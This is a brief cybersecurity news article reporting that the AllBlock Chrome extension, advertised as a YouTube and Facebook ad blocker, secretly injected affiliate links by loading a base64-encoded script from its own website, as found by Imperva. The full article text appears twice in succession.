AllBlock: Chrome Blocking Extension Injecting Illegal Ads

0

The AllBlock Chromium ad blocker, which worked as an extension to Google Chrome, was actually doing the exact opposite of the promised job: injecting hidden advertiser links, which generated commissions for the tool’s developers. The extension, which was available on the Chrome Web Store, was advertised as an ad blocker specializing in YouTube and Facebook.

Searching since August for a new set of malicious domains freely distributing an ad injection code, cybersecurity company Imperva finally found the malicious script in a “bg.gs” file (characteristic of Google Apps Script). Interestingly, the JavaScript snippet was “cloaked” between innocuous AllBlock variables.

However, the malware did not take the user to ad pages, but caused legitimate URLs, once opened, to be redirected to affiliate links controlled by the alleged “blocker” developers. As a result, ads or links were placed on trusted web pages that normally do not host this type of advertising.

How does ad injection work?

Ad injection is a process of inserting unwanted and unauthorized ads into a webpage that has not hosted them, causing a user who trusts the page to end up clicking on them. The operation is obviously only profitable for scammers who deceive users twice: when they install a blocker that injects ads, and when they click on spurious ads supposedly served by trusted pages.

Interestingly, AllBlock had excellent user reviews because its original ad blocker functionality worked so well. However, on each page opening, it connected to a URL hosted on the allblock.net website, which returned a script encoded in the base64 algorithm, which was then decoded and injected into the page that was in use.

Both the suspicious extension and web page are currently blocked.

The AllBlock Chromium ad blocker, which worked as an extension to Google Chrome, was actually doing the exact opposite of the promised job: injecting hidden advertiser links, which generated commissions for the tool’s developers. The extension, which was available on the Chrome Web Store, was advertised as an ad blocker specializing in YouTube and Facebook.

Searching since August for a new set of malicious domains freely distributing an ad injection code, cybersecurity company Imperva finally found the malicious script in a “bg.gs” file (characteristic of Google Apps Script). Interestingly, the JavaScript snippet was “cloaked” between innocuous AllBlock variables.

However, the malware did not take the user to ad pages, but caused legitimate URLs, once opened, to be redirected to affiliate links controlled by the alleged “blocker” developers. As a result, ads or links were placed on trusted web pages that normally do not host this type of advertising.

How does ad injection work?

Ad injection is a process of inserting unwanted and unauthorized ads into a webpage that has not hosted them, causing a user who trusts the page to end up clicking on them. The operation is obviously only profitable for scammers who deceive users twice: when they install a blocker that injects ads, and when they click on spurious ads supposedly served by trusted pages.

Interestingly, AllBlock had excellent user reviews because its original ad blocker functionality worked so well. However, on each page opening, it connected to a URL hosted on the allblock.net website, which returned a script encoded in the base64 algorithm, which was then decoded and injected into the page that was in use.

Both the suspicious extension and web page are currently blocked.